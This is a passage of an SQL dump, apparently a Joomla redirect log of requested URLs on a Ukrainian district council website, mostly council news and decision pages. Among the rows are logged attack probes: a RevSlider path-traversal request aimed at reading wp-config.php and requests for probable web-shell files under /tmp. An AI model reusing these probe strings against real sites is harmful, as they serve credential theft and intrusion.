20:13:15','0000-00-00 00:00:00',301),(25757,'http://malyn-rayrada.org.ua/index.php/1002-pro-sklikannya-37-sesiji-rajonnoji-radi-6-sklikannya','','','',7,0,'2016-02-11 20:28:55','0000-00-00 00:00:00',301),(25758,'http://malyn-rayrada.org.ua/index.php/1002-pro-sklikannya-37-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-02-11 20:28:57','0000-00-00 00:00:00',301),(25759,'http://malyn-rayrada.org.ua/index.php/1004-komunalne-pidpriemstvo-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu','','','',4,0,'2016-02-11 20:29:03','0000-00-00 00:00:00',301),(25760,'http://malyn-rayrada.org.ua/index.php/1106-vidbuvsya-rajonnij-seminar-z-pitan-obgovorennya-ta-pidgotovki-proektiv-vidpovidnikh-rishen-shchodo-dobrovilnogo-ob-ednannya-teritorialnikh-gromad','','','',4,0,'2016-02-11 20:30:33','0000-00-00 00:00:00',301),(25761,'http://malyn-rayrada.org.ua/index.php/18-do-vidoma-zhiteliv-malinshhini','','','',7,0,'2016-02-11 20:31:44','0000-00-00 00:00:00',301),(25762,'http://malyn-rayrada.org.ua/index.php/455-199-rokiv-tomu-narodivsja-taras-shevchenko','','','',7,0,'2016-02-11 20:32:23','0000-00-00 00:00:00',301),(25763,'http://malyn-rayrada.org.ua/index.php/741-upravlinnja-pensijnogo-fondu-ukraini-v-malinskomu','','','',2,0,'2016-02-11 20:32:38','0000-00-00 00:00:00',301),(25764,'http://malyn-rayrada.org.ua/index.php/900-pro-timchasove-vikonannya-obov-yazkiv-golovi-malinskoji-rajonnoji-derzhavnoji-adminis','','','',1,0,'2016-02-11 20:32:46','0000-00-00 00:00:00',301),(25765,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=455:2011-11-10-13-39-05&catid=38&Itemid=73&lang=en','','','',3,0,'2016-02-11 20:35:55','0000-00-00 00:00:00',301),(25766,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=455:2011-11-10-13-39-05&catid=38&Itemid=73&lang=ru','','','',3,0,'2016-02-11 20:35:57','0000-00-00 00:00:00',301),(25767,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=455:2011-11-10-13-39-05&catid=38&Itemid=73&lang=uk','','','',3,0,'2016-02-11 20:35:59','0000-00-00 00:00:00',301),(25768,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=455:2011-11-10-13-39-05&catid=38:--19122011-&Itemid=73&lang=en','','','',3,0,'2016-02-11 20:36:00','0000-00-00 00:00:00',301),(25769,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=455:2011-11-10-13-39-05&catid=38:--19122011-&Itemid=73&lang=ru','','','',4,0,'2016-02-11 20:36:02','0000-00-00 00:00:00',301),(25770,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=455:2011-11-10-13-39-05&catid=38:--19122011-&Itemid=73&lang=uk','','','',4,0,'2016-02-11 20:36:04','0000-00-00 00:00:00',301),(25771,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=741:---------l----r&catid=43:--25072012-&Itemid=82&lang=en','','','',4,0,'2016-02-11 20:36:08','0000-00-00 00:00:00',301),(25772,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=741:---------l----r&catid=43:--25072012-&Itemid=82&lang=uk','','','',4,0,'2016-02-11 20:36:10','0000-00-00 00:00:00',301),(25773,'http://www.malyn-rayrada.org.ua/index.php/1106-vidbuvsya-rajonnij-seminar-z-pitan-obgovorennya-ta-pidgotovki-proektiv-vidpovidnikh-rishen-shchodo-dobrovilnogo-ob-ednannya-teritorialnikh-gromad','','','',25,0,'2016-02-11 20:38:48','0000-00-00 00:00:00',301),(25774,'http://www.malyn-rayrada.org.ua/index.php/185-vitaemo-z-dnem-peremogi?tmpl=component&print=1&layout=default&page=','','','',10,0,'2016-02-11 20:39:53','0000-00-00 00:00:00',301),(25775,'http://www.malyn-rayrada.org.ua/index.php/920-oberezhno-chuma-svinej-uzhe-v-ivankivskomu-rajoni','','','',28,0,'2016-02-11 20:54:22','0000-00-00 00:00:00',301),(25776,'http://malyn-rayrada.org.ua/index.php/component/content/article?id=article','','','',14,0,'2016-02-11 22:00:30','0000-00-00 00:00:00',301),(25777,'http://malyn-rayrada.org.ua/index.php?catid=1350&id=1350:zvernennya-spetsialistiv-veterinarnoji-meditsini-do-zhiteliv-m-malina-ta-malinskogo-rajonu','','','',5,0,'2016-02-11 22:00:46','0000-00-00 00:00:00',301),(25778,'http://malyn-rayrada.org.ua/index.php?tmpl=component&print=1&layout=default&page=&catid=1350&id=1350:zvernennya-spetsialistiv-veterinarnoji-meditsini-do-zhiteliv-m-malina-ta-malinskogo-rajonu','','','',5,0,'2016-02-11 22:00:48','0000-00-00 00:00:00',301),(25779,'http://www.malyn-rayrada.org.ua/index.php?catid=1350&id=1350:zvernennya-spetsialistiv-veterinarnoji-meditsini-do-zhiteliv-m-malina-ta-malinskogo-rajonu','','','',20,0,'2016-02-11 22:01:25','0000-00-00 00:00:00',301),(25780,'http://www.malyn-rayrada.org.ua/index.php?tmpl=component&print=1&layout=default&page=&catid=1350&id=1350:zvernennya-spetsialistiv-veterinarnoji-meditsini-do-zhiteliv-m-malina-ta-malinskogo-rajonu','','','',2,0,'2016-02-11 22:01:26','0000-00-00 00:00:00',301),(25781,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=519:-2011-&catid=11&Itemid=14&lang=uk','','','',2,0,'2016-02-11 23:04:09','0000-00-00 00:00:00',301),(25782,'http://www.malyn-rayrada.org.ua/administrator/includes/pathways.php','','','',1,0,'2016-02-12 00:39:26','0000-00-00 00:00:00',301),(25783,'http://www.malyn-rayrada.org.ua/index.php/892-zalishilos-30-kandidativ-u-deputati','','','',10,0,'2016-02-12 04:09:57','0000-00-00 00:00:00',301),(25784,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=663:-------20042012675-12&catid=41:--27042012-&Itemid=78&lang=uk','','','',2,0,'2016-02-12 05:05:37','0000-00-00 00:00:00',301),(25785,'http://www.malyn-rayrada.org.ua/index.php/898-povidomlennya-pro-rezultati-pozachergovikh-viboriv-chopovitskogo-selishchnogo-golovi','','http://go.mail.ru/search_images','',19,0,'2016-02-12 05:21:19','0000-00-00 00:00:00',301),(25786,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011?start=10','','','',6,0,'2016-02-12 06:03:38','0000-00-00 00:00:00',301),(25787,'http://www.malyn-rayrada.org.ua/index.php/1015-pro-perenesennya-dati-sklikannya-37-sesiji-rajonnoji-radi-6-sklikannya','','','',12,0,'2016-02-12 06:26:42','0000-00-00 00:00:00',301),(25788,'http://www.malyn-rayrada.org.ua/index.php/1215-shchodo-situatsiji-iz-skraplenim-gazom?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-02-12 06:26:45','0000-00-00 00:00:00',301),(25789,'http://www.malyn-rayrada.org.ua/index.php/1238-pro-sklikannya-2-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-12 06:26:47','0000-00-00 00:00:00',301),(25790,'http://www.malyn-rayrada.org.ua/index.php/1173-ogoloshennya-shchodo-orendi-majna','','','',18,0,'2016-02-12 06:28:28','0000-00-00 00:00:00',301),(25791,'http://malyn-rayrada.org.ua/index.php/1015-pro-perenesennya-dati-sklikannya-37-sesiji-rajonnoji-radi-6-sklikannya','','','',14,0,'2016-02-12 06:45:23','0000-00-00 00:00:00',301),(25792,'http://malyn-rayrada.org.ua/index.php/1075-shanovni-malinchani-ta-gosti-malinshchini','','','',13,0,'2016-02-12 06:45:24','0000-00-00 00:00:00',301),(25793,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44?catid=415&id=415:kontaktna-informacija-3','','','',4,0,'2016-02-12 06:45:33','0000-00-00 00:00:00',301),(25794,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44?tmpl=component&print=1&layout=default&page=&catid=415&id=415:kontaktna-informacija-3','','','',4,0,'2016-02-12 06:45:34','0000-00-00 00:00:00',301),(25795,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1271-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-radi-vitrat-na-jogo-utrimannya','','','',6,0,'2016-02-12 06:45:53','0000-00-00 00:00:00',301),(25796,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1274-pro-likvidatsiyu-lyubovitskoji-ta-shevchenkivskoji-zagalnoosvitnikh-shkil-i-ii-stupeniv?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-12 06:45:55','0000-00-00 00:00:00',301),(25797,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1275-pro-pogodzhennya-zvilnennya-z-posadi-direktora-rajonnogo-budinku-kulturi-vishnevskoji-o-v?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-12 06:45:59','0000-00-00 00:00:00',301),(25798,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1282-pro-viznachennya-umov-oplati-pratsi-golovi-rajonnoji-radi-ta-zastupnika-golovi-rajonnoji-radi-na-2016-rik','','','',6,0,'2016-02-12 06:46:17','0000-00-00 00:00:00',301),(25799,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1283-pro-rajonnij-byudzhet-na-2016-rik?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-12 06:46:20','0000-00-00 00:00:00',301),(25800,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1284-pro-pilgovij-projizd-uchniv-ta-pedagogichnikh-pratsivnikiv-zakladiv-osviti-malinskogo-rajonu-na-2016-rik?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-12 06:46:26','0000-00-00 00:00:00',301),(25801,'http://malyn-rayrada.org.ua/index.php?tmpl=component&print=1&layout=default&page=&catid=945&id=945:perevirka','','','',4,0,'2016-02-12 06:48:35','0000-00-00 00:00:00',301),(25802,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=329:2011-05-20-16-25-10&catid=33:-20052011&Itemid=66&lang=uk','','','',1,0,'2016-02-12 09:20:36','0000-00-00 00:00:00',301),(25803,'http://malyn-rayrada.org.ua/index.php/975-pro-priznachennya-v-litvinenka-golovoyu-malinskoji-rajonnoji-derzhavnoji-administratsiji-zhitomirskoji-oblasti','','','',5,0,'2016-02-12 10:36:08','0000-00-00 00:00:00',301),(25804,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=580:-l-r-2012-2016-&catid=36&Itemid=70&lang=en','','','',1,0,'2016-02-12 10:46:02','0000-00-00 00:00:00',301),(25805,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1213:2014-02-14-13-53-12&Itemid=14&lang=ru&option=com_content&view=article','','','',4,0,'2016-02-12 14:24:56','0000-00-00 00:00:00',301),(25806,'http://malyn-rayrada.org.ua/index.php/41-z-dnem-peremogi?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-02-12 15:08:08','0000-00-00 00:00:00',301),(25807,'http://malyn-rayrada.org.ua/index.php/886-pro-den-zakhisnika-ukrajini','','','',6,0,'2016-02-12 16:20:32','0000-00-00 00:00:00',301),(25808,'http://malyn-rayrada.org.ua/index.php/889-novini-fiskalnoji-sluzhbi','','','',5,0,'2016-02-12 16:20:34','0000-00-00 00:00:00',301),(25809,'http://malyn-rayrada.org.ua/index.php/890-upravlinnya-pratsi-ta-sotsialnogo-zakhistu-naselennya-rajderzhadministratsiji-informue?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-02-12 16:20:37','0000-00-00 00:00:00',301),(25810,'http://malyn-rayrada.org.ua/index.php/892-zalishilos-30-kandidativ-u-deputati','','','',5,0,'2016-02-12 16:20:40','0000-00-00 00:00:00',301),(25811,'http://malyn-rayrada.org.ua/index.php/892-zalishilos-30-kandidativ-u-deputati?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-02-12 16:20:41','0000-00-00 00:00:00',301),(25812,'http://malyn-rayrada.org.ua/index.php/893-yatsenyuk-ozvuchiv-grafik-lyustratsiji','','','',4,0,'2016-02-12 16:20:44','0000-00-00 00:00:00',301),(25813,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1253-pro-rajonnu-kompleksnu-programu-sotsialnoji-pidtrimki-uchasnikiv-antiteroristichnoji-operatsiji-ta-chleniv-jikh-simej-na-2016-2020-roki','','','',4,0,'2016-02-12 16:21:07','0000-00-00 00:00:00',301),(25814,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1255-pro-programu-rozvitku-donorstva-krovi-ta-jiji-komponentiv-u-malinskomu-rajoni-na-2015-2018-roki','','','',4,0,'2016-02-12 16:21:10','0000-00-00 00:00:00',301),(25815,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=730:2012-07-02-05-04-18&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-12 16:31:45','0000-00-00 00:00:00',301),(25816,'http://www.malyn-rayrada.org.ua/index.php/663-shhodo-vidilennja-avtomobiliv-ekstrenoi-medichnoi','','','',14,0,'2016-02-12 20:42:20','0000-00-00 00:00:00',301),(25817,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=191:2010-12-15-13-27-06&catid=29:--15122010-&Itemid=60&lang=en','','','',1,0,'2016-02-12 21:00:27','0000-00-00 00:00:00',301),(25818,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=753:2012-09-05-09-48-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2016-02-12 21:01:36','0000-00-00 00:00:00',301),(25819,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1075:2013-09-06-09-25-33&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-12 21:01:45','0000-00-00 00:00:00',301),(25820,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=957:199-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2016-02-12 21:01:53','0000-00-00 00:00:00',301),(25821,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1215:-1200-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-12 23:10:05','0000-00-00 00:00:00',301),(25822,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen?catid=1350&id=1350:zvernennya-spetsialistiv-veterinarnoji-meditsini-do-zhiteliv-m-malina-ta-malinskogo-rajonu','','','',13,0,'2016-02-13 01:58:22','0000-00-00 00:00:00',301),(25823,'http://malyn-rayrada.org.ua/index.php/1054-z-24-lyutogo-po-24-bereznya-v-ukrajini-provodivsya-misyachnik-borotbi-z-tuberkulozom','','','',5,0,'2016-02-13 02:25:01','0000-00-00 00:00:00',301),(25824,'http://www.malyn-rayrada.org.ua/index.php/829-zaversheno-pidgotovku-do-provedennja-chergovoi_5','','','',15,0,'2016-02-13 04:23:22','0000-00-00 00:00:00',301),(25825,'http://www.malyn-rayrada.org.ua/index.php/19-pro-nadannja-groshovoi-dopomogi-z-nagodi-69-i','','','',18,0,'2016-02-13 04:56:10','0000-00-00 00:00:00',301),(25826,'http://www.malyn-rayrada.org.ua/index.php/685-z-novim-rokom-ta-rizdvom-hristovim_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-13 04:58:17','0000-00-00 00:00:00',301),(25827,'http://www.malyn-rayrada.org.ua/index.php/687-hristos-rozhdaetsja-slavimo-jogo_2','','','',31,0,'2016-02-13 04:58:21','0000-00-00 00:00:00',301),(25828,'http://www.malyn-rayrada.org.ua/index.php/691-shhodo-situacii-z-medichnim-obslugovuvannjam?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-13 04:58:23','0000-00-00 00:00:00',301),(25829,'http://www.malyn-rayrada.org.ua/index.php/727-do-vidoma-pensioneriv-onovleno','','','',15,0,'2016-02-13 04:59:48','0000-00-00 00:00:00',301),(25830,'http://www.malyn-rayrada.org.ua/index.php/727-do-vidoma-pensioneriv-onovleno?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-13 04:59:49','0000-00-00 00:00:00',301),(25831,'http://www.malyn-rayrada.org.ua/index.php/729-vitaemo-usih-zhinok-iz-svjatom-vesni?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-02-13 04:59:55','0000-00-00 00:00:00',301),(25832,'http://www.malyn-rayrada.org.ua/index.php/730-sogodni-ves-svit-vidznachae-200-richnij-juvilej','','','',14,0,'2016-02-13 04:59:57','0000-00-00 00:00:00',301),(25833,'http://www.malyn-rayrada.org.ua/index.php/731-pro-ekonomiju-derzhavnih-koshtiv-ta-nedopushhennja','','','',23,0,'2016-02-13 04:59:59','0000-00-00 00:00:00',301),(25834,'http://www.malyn-rayrada.org.ua/index.php/740-do-vidoma-zhiteliv-mista-ta-rajonu_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-13 05:00:01','0000-00-00 00:00:00',301),(25835,'http://www.malyn-rayrada.org.ua/index.php/743-do-vidoma-zhiteliv-mista-ta-rajonu_3','','','',9,0,'2016-02-13 05:00:03','0000-00-00 00:00:00',301),(25836,'http://www.malyn-rayrada.org.ua/index.php/745-do-vidoma-pensioneriv_2','','','',13,0,'2016-02-13 05:00:05','0000-00-00 00:00:00',301),(25837,'http://www.malyn-rayrada.org.ua/index.php/745-do-vidoma-pensioneriv_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-13 05:00:07','0000-00-00 00:00:00',301),(25838,'http://www.malyn-rayrada.org.ua/index.php/753-do-vidoma-deputativ-rajonnoi-radi_3','','','',15,0,'2016-02-13 05:00:14','0000-00-00 00:00:00',301),(25839,'http://www.malyn-rayrada.org.ua/index.php/753-do-vidoma-deputativ-rajonnoi-radi_3?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-13 05:00:17','0000-00-00 00:00:00',301),(25840,'http://www.malyn-rayrada.org.ua/index.php/772-pravoslavni-hristijani-svjatkujut-sogodni-verbnu','','','',11,0,'2016-02-13 05:00:36','0000-00-00 00:00:00',301),(25841,'http://www.malyn-rayrada.org.ua/index.php/772-pravoslavni-hristijani-svjatkujut-sogodni-verbnu?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-13 05:00:39','0000-00-00 00:00:00',301),(25842,'http://www.malyn-rayrada.org.ua/index.php/799-pro-sklikannja-31-sesii-rajonnoi-radi-6-sklikannja','','','',18,0,'2016-02-13 05:00:45','0000-00-00 00:00:00',301),(25843,'http://www.malyn-rayrada.org.ua/index.php/830-ogoloshennja-kubok-pirizhok?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-02-13 05:01:29','0000-00-00 00:00:00',301),(25844,'http://www.malyn-rayrada.org.ua/index.php/839-do-vidoma-zhiteliv-malinshhini-3','','','',19,0,'2016-02-13 05:01:36','0000-00-00 00:00:00',301),(25845,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&id=45:--14112012-&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','http://go.mail.ru/search_images','',3,0,'2016-02-13 09:03:10','0000-00-00 00:00:00',301),(25846,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=717:2012-06-14-15-22-29&catid=43:--25072012-&Itemid=82&lang=ru','','','',1,0,'2016-02-13 11:01:10','0000-00-00 00:00:00',301),(25847,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','','','',2,0,'2016-02-13 13:57:06','0000-00-00 00:00:00',301),(25848,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/wp-admin/admin-ajax.php','','','',2,0,'2016-02-13 13:57:07','0000-00-00 00:00:00',301),(25849,'http://malyn-rayrada.org.ua/tmp/bogel.php?db','','','',1,0,'2016-02-13 14:28:57','0000-00-00 00:00:00',301),(25850,'http://malyn-rayrada.org.ua/tmp/recky.php','','','',1,0,'2016-02-13 14:28:57','0000-00-00 00:00:00',301),(25851,'http://malyn-rayrada.org.ua/tmp/metri.php','','','',2,0,'2016-02-13 14:28:59','0000-00-00 00:00:00',301),(25852,'http://www.malyn-rayrada.org.ua/onclick=','','','',1,0,'2016-02-13 14:47:58','0000-00-00 00:00:00',301),(25853,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45//images/stories/wawalo.gif','','','',1,0,'2016-02-13 17:36:04','0000-00-00 00:00:00',301),(25854,'http://www.malyn-rayrada.org.ua/index.php/323-hristos-rozhdaetsja-slavimo-jogo','','','',56,0,'2016-02-13 18:17:58','0000-00-00 00:00:00',301),(25855,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1041-2013-07-02-13-55-38?lang=uk','','http://go.mail.ru/search_images','',1,0,'2016-02-13 19:10:16','0000-00-00 00:00:00',301),(25856,'http://www.malyn-rayrada.org.ua/index.php/900-pro-timchasove-vikonannya-obov-yazkiv-golovi-malinskoji-rajonnoji-derzhavnoji-administratsiji-zhitomirskoji-oblasti','','http://go.mail.ru/search_images','',12,0,'2016-02-13 22:22:01','0000-00-00 00:00:00',301),(25857,'http://www.malyn-rayrada.org.ua/index.php/896-povidomlennya-pro-rezultati-pozachergovikh-viboriv-barvinkivskogo-silskogo-golovi','','','',26,0,'2016-02-14 01:38:24','0000-00-00 00:00:00',301),(25858,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=348:2011-06-15-12-35-38&catid=34:--15062011-&Itemid=68&lang=ru','','','',5,0,'2016-02-14 03:20:10','0000-00-00 00:00:00',301),(25859,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1046:-2013-&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',3,0,'2016-02-14 04:17:06','0000-00-00 00:00:00',301),(25860,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=846:2012-12-10-14-06-00&catid=46:--21122012&Itemid=85&lang=ru','','','',4,0,'2016-02-14 06:29:42','0000-00-00 00:00:00',301),(25861,'http://malyn-rayrada.org.ua/index.php?catid=1016&id=1016:upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-povidomlyae-platnikiv','','','',2,0,'2016-02-14 07:50:01','0000-00-00 00:00:00',301),(25862,'http://www.malyn-rayrada.org.ua/index.php/component/content/article','','','',1,0,'2016-02-14 07:50:41','0000-00-00 00:00:00',301),(25863,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?id=article','','','',3,0,'2016-02-14 07:51:00','0000-00-00 00:00:00',301),(25864,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&id=51:--19072013-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-02-14 08:35:01','0000-00-00 00:00:00',301),(25865,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=1106:-qq','','','',40,0,'2016-02-14 08:50:00','0000-00-00 00:00:00',301),(25866,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1270-pro-zatverdzhennya-planu-diyalnosti-rajonnoji-radi-z-pidgotovki-proektiv-regulyatornikh-aktiv-na-2016-rik','','','',3,0,'2016-02-14 10:40:31','0000-00-00 00:00:00',301),(25867,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=743:2012-07-26-08-11-32&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',19,0,'2016-02-14 13:07:08','0000-00-00 00:00:00',301),(25868,'http://www.malyn-rayrada.org.ua/index.php/970-pro-cotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-listopad-2014-roku?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-14 13:07:12','0000-00-00 00:00:00',301),(25869,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=740:-lr-&catid=43:--25072012-&Itemid=82&lang=uk','','','',3,0,'2016-02-14 13:07:25','0000-00-00 00:00:00',301),(25870,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=741:---------l----r&catid=43:--25072012-&Itemid=82&lang=ru','','','',4,0,'2016-02-14 13:07:53','0000-00-00 00:00:00',301),(25871,'http://www.malyn-rayrada.org.ua/attachments/390_reiting.pdf','','','',3,0,'2016-02-14 13:07:58','0000-00-00 00:00:00',301),(25872,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=730:2012-07-02-05-04-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2016-02-14 13:09:10','0000-00-00 00:00:00',301),(25873,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=462:------2012-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2016-02-14 13:09:19','0000-00-00 00:00:00',301),(25874,'http://www.malyn-rayrada.org.ua/index.php/41-z-dnem-peremogi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-14 13:09:25','0000-00-00 00:00:00',301),(25875,'http://www.malyn-rayrada.org.ua/index.php/323-hristos-rozhdaetsja-slavimo-jogo?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-14 13:09:46','0000-00-00 00:00:00',301),(25876,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=729:-l20-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2016-02-14 13:10:14','0000-00-00 00:00:00',301),(25877,'http://www.malyn-rayrada.org.ua/index.php/390-malinshhina-svjatkue-90-richchja-utvorennja-rajonu','','','',16,0,'2016-02-14 13:10:15','0000-00-00 00:00:00',301),(25878,'http://www.malyn-rayrada.org.ua/index.php/404-24-listopada-o-16-00-vidbudetsja-zagalnonacionalna','','','',14,0,'2016-02-14 13:10:15','0000-00-00 00:00:00',301),(25879,'http://www.malyn-rayrada.org.ua/index.php/434-kozhna-posluga-povinna-buti-oplachena','','','',20,0,'2016-02-14 13:10:16','0000-00-00 00:00:00',301),(25880,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=663:-------20042012675-12&catid=41:--27042012-&Itemid=78&lang=ru','','','',7,0,'2016-02-14 13:10:23','0000-00-00 00:00:00',301),(25881,'http://www.malyn-rayrada.org.ua/index.php/466-chi-vidkrie-dveri-1-veresnja-2013-roku-novo-vorob','','','',53,0,'2016-02-14 13:10:26','0000-00-00 00:00:00',301),(25882,'http://www.malyn-rayrada.org.ua/language/en-GB/en-GB.xmlindex.php','','http://www.malyn-rayrada.org.ua/language/en-GB/en-GB.xmlindex.php','',1,0,'2016-02-14 13:20:31','0000-00-00 00:00:00',301),(25883,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=434:2011-10-21-15-10-36&Itemid=72&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-14 14:34:10','0000-00-00 00:00:00',301),(25884,'http://malyn-rayrada.org.ua/index.php/1251-pro-sklikannya-3-sesiji-rajonnoji-radi-7-sklikannya','','','',11,0,'2016-02-14 15:47:34','0000-00-00 00:00:00',301),(25885,'http://malyn-rayrada.org.ua/index.php/1251-pro-sklikannya-3-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=','','','',11,0,'2016-02-14 15:47:36','0000-00-00 00:00:00',301),(25886,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04','','','',5,0,'2016-02-14 15:47:52','0000-00-00 00:00:00',301),(25887,'http://malyn-rayrada.org.ua/index.php/323-hristos-rozhdaetsja-slavimo-jogo','','','',11,0,'2016-02-14 15:48:34','0000-00-00 00:00:00',301),(25888,'http://malyn-rayrada.org.ua/index.php/705-korotko-pro-finansi','','','',1,0,'2016-02-14 15:48:53','0000-00-00 00:00:00',301),(25889,'http://malyn-rayrada.org.ua/index.php/932-ogoloshennya-shchodo-komunalnogo-majna-orenda','','','',6,0,'2016-02-14 15:49:27','0000-00-00 00:00:00',301),(25890,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=18:2010-06-06-10-06-41&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',2,0,'2016-02-14 15:49:58','0000-00-00 00:00:00',301),(25891,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=18:2010-06-06-10-06-41&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',2,0,'2016-02-14 15:50:00','0000-00-00 00:00:00',301),(25892,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=18:2010-06-06-10-06-41&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',2,0,'2016-02-14 15:50:02','0000-00-00 00:00:00',301),(25893,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=786:-5-18112009-429-l-r&catid=45&Itemid=84&lang=en','','','',3,0,'2016-02-14 15:50:08','0000-00-00 00:00:00',301),(25894,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=786:-5-18112009-429-l-r&catid=45&Itemid=84&lang=ru','','','',3,0,'2016-02-14 15:50:11','0000-00-00 00:00:00',301),(25895,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=788:-lr-2012-2015-&catid=45&Itemid=84&lang=en','','','',3,0,'2016-02-14 15:50:13','0000-00-00 